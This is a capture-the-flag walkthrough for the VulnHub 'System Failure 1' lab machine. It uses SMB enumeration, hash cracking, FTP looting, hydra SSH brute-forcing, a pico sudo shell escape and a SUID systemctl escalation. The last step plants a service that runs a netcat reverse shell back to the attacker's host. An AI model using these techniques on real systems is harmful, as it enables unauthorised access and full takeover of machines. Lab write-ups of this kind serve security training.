https://www.vulnhub.com/entry/system-failure-1,654/
Scan ports.
# Nmap 7.91 scan initiated Thu Mar 11 21:49:07 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.80 Nmap scan report for 192.168.56.80 Host is up (0.014s latency). Not shown: 65530 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 bb:02:d1:ee:91:11:fe:a0:b7:90:e6:e0:07:49:95:85 (RSA) | 256 ef:e6:04:30:01:50:07:5d:2d:17:99:d1:00:3d:f2:d6 (ECDSA) |_ 256 80:7f:c5:96:0e:3d:66:b9:d6:a8:6f:59:fa:ca:86:36 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) Service Info: Host: SYSTEMFAILURE; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Enum smb, download file "share", check the content.
┌──(kali㉿mykali)-[~] └─$ smbclient -L 192.168.56.80 Enter WORKGROUP\kali's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk open IPC$ IPC IPC Service (Samba 4.9.5-Debian) SMB1 disabled -- no workgroup available ┌──(kali㉿mykali)-[~] └─$ smbclient //192.168.56.80/anonymous Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Fri Dec 18 05:25:14 2020 .. D 0 Wed Dec 16 22:58:53 2020 share N 220 Fri Dec 18 05:25:14 2020 7205476 blocks of size 1024. 5406288 blocks available smb: \> get share getting file \share of size 220 as share (9.8 KiloBytes/sec) (average 9.8 KiloBytes/sec) smb: \> quit ┌──(kali㉿mykali)-[~/Documents/systemfailure] └─$ cat share Guys, I left you access only here to give you my shared file, you have little time, I leave you the login credentials inside for FTP you will find some info, you have to hurry! 89492D216D0A212F8ED54FC5AC9D340B Admin
Also, through smb, we can get 4 user's names.
┌──(kali㉿mykali)-[~/Documents/systemfailure] └─$ enum4linux -a 192.168.56.80 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 12 22:35:43 2021 ... ======================================================================== | Users on 192.168.56.80 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-992311547-1957423116-3284270811 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\valex (Local User) S-1-22-1-1001 Unix User\admin (Local User) S-1-22-1-1002 Unix User\jin (Local User) S-1-22-1-1003 Unix User\superadmin (Local User) ...
Decrypt the hash code.
Ftp login as "admin" with the password, download here.txt.
┌──(kali㉿mykali)-[~/Documents/systemfailure] └─$ ftp 192.168.56.80 130 ⨯ Connected to 192.168.56.80. 220 (vsFTPd 3.0.3) Name (192.168.56.80:kali): admin 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Dec 16 12:45 Interesting drwxr-xr-x 2 0 0 4096 Dec 16 12:45 Secr3t drwxr-xr-x 3 0 0 4096 Dec 20 05:25 Syst3m drwxr-xr-x 2 0 0 4096 Dec 16 12:45 Useful ftp> cd Syst3m 250 Directory successfully changed. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 0 0 4096 Dec 20 05:25 . drwxr-xr-x 8 1001 1001 4096 Dec 24 10:33 .. drwxr-xr-x 2 0 0 36864 Dec 20 05:30 F4iluR3 -rw-r--r-- 1 0 0 89 Dec 20 05:17 here.txt 226 Directory send OK.
Check here.txt.
┌──(kali㉿mykali)-[~/Documents/systemfailure] └─$ cat here.txt (I l3f7 y0u 0ur s3cr3t c0d3)+(I l3f7 17 ju57 f0r y0u)+(t0 m4k3)x(7h1ng5 s4f3r.) -Admin
In F4iluR3 folder, there are about 1000 files, turn off interactive mode, download them all.
ftp> prompt off Interactive mode off. ftp> mget * local: file.txt remote: file.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for file.txt (1696 bytes). 226 Transfer complete. 1696 bytes received in 0.00 secs (5.1841 MB/s) local: file0001.txt remote: file0001.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for file0001.txt (1696 bytes). 226 Transfer complete. ...
List all the files, sort by size, only one file is different than others. Check the content, find a strange string.
┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3] └─$ ls -laSr... -rw-r--r-- 1 kali kali 1696 Mar 12 22:44 file0002.txt -rw-r--r-- 1 kali kali 1696 Mar 12 22:44 file0001.txt -rw-r--r-- 1 kali kali 1714 Mar 12 22:46 file0189.txt drwxr-xr-x 6 kali kali 32768 Mar 12 22:46 .. drwxr-xr-x 2 kali kali 32768 Mar 12 22:46 . ┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3] └─$ cat file0189.txt Systems Failure is a role-playing game written by Bill Coffin and published by Palladium Books in July 1999.The fictional premise for the game is that during the "Millennium bug" scare, actual "Bugs" appeared. They are energy beings from beyond Earth (whether another dimension or another planet is not clear) that invaded at the end of 1999, leaving a post-apocalyptic world in their wake. The Bugs feed on energy and are capable of transmitting themselves through modern power transmission and phone lines.The Bugs come in several varieties. There are the drone-like Army Ants who have only basic intelligence, the more intelligent Assassin Bugs who can replicate human speech, though imperfectly, and the flying Lightning Bugs, amongst others. All of them are able to turn themselves into energy or rapidly call up reinforcements. In addition to these, there are "brain bugs", a variety that can invade human minds and turn them into zombie-like servants of the Bugs.Players take the part of survivors of this invasion ten years after it occurred. Some groups, such as survival-oriented militias, were well-prepared for something to go wrong and so form the nuclei of stable societies and resistance to the Bugs. Military units have converged on NORAD which is using genetic engineering to create new weapons that the Bugs cannot gain control of, and to create super-soldiers-J310MIYla1aVUaSV-, both those that have psionic powers and those who have been mutated into insect-like supermen using Bug DNA. In addition, there are people who have been driven mad by the stress, those who have joined gangs and seek to exploit others, and those who trade their skills as mechanics, medics, scientists, or merchants.
Decrypt the string with base62.
Check http://192.168.56.80/area4/Sup3rS3cR37/System/, get two files. Userful.txt seems a dictionary.
┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3] └─$ curl http://192.168.56.80/area4/Sup3rS3cR37/System/note.txt Guys, I left something here for you, I know your skills well, we must try to hurry. Not always everything goes the right way. -Admin ┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3] └─$ curl http://192.168.56.80/area4/Sup3rS3cR37/System/useful.txt andres courtney booboo kissme harley ronaldo ...
Brute force ssh with names enumd from smb and dictionary. Take care the note.txt, "right" way. So we need to set "-e r" in hydra.
┌──(kali㉿mykali)-[~/Documents/systemfailure] └─$ hydra -L names.txt -P useful.txt -e nsr 192.168.56.80 ssh -t 32 ... [DATA] attacking ssh://192.168.56.80:22/ [STATUS] 283.00 tries/min, 283 tries in 00:01h, 782 to do in 00:03h, 32 active [22][ssh] host: 192.168.56.80 login: valex password: ... 1 of 1 target successfully completed, 1 valid password found
Ssh log in as valex, check sudo.
valex@SystemFailure:~$ sudo -l sudo: unable to resolve host SystemFailure: Temporary failure in name resolution Matching Defaults entries for valex on SystemFailure: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User valex may run the following commands on SystemFailure: (jin) NOPASSWD: /usr/bin/pico
Run /usr/bin/pico, looks like nano. We can escalate to user jin through nano.
pico ^R^X reset; sh 1>&0 2>&0
As user jin, check SUID file.
jin@SystemFailure:~$ find / -perm -u=s 2>/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/mount /usr/bin/umount /usr/bin/systemctl /usr/bin/gpasswd /usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn
Get root through systemctl.
jin@SystemFailure:~$ echo '[Service] > Type=oneshot > ExecStart=nc 192.168.56.150 2234 -e /bin/bash > [Install] > WantedBy=multi-user.target' > $TF jin@SystemFailure:~$ /usr/bin/systemctl link $TF Created symlink /etc/systemd/system/tmp.noEJj88ESX.service → /tmp/tmp.noEJj88ESX.service. jin@SystemFailure:~$ /usr/bin/systemctl enable --now $TF Created symlink /etc/systemd/system/multi-user.target.wants/tmp.noEJj88ESX.service → /tmp/tmp.noEJj88ESX.service.
Check root flag.
listening on [any] 2234 ... connect to [192.168.56.150] from (UNKNOWN) [192.168.56.80] 42672 cd /root ls root.txt id;hostname;cat root.txt uid=0(root) gid=0(root) groups=0(root) SystemFailure If you are reading this flag, without being rooted, it is not valid. You must enter after send me a picture you entered jin, and tag me. Good luck.
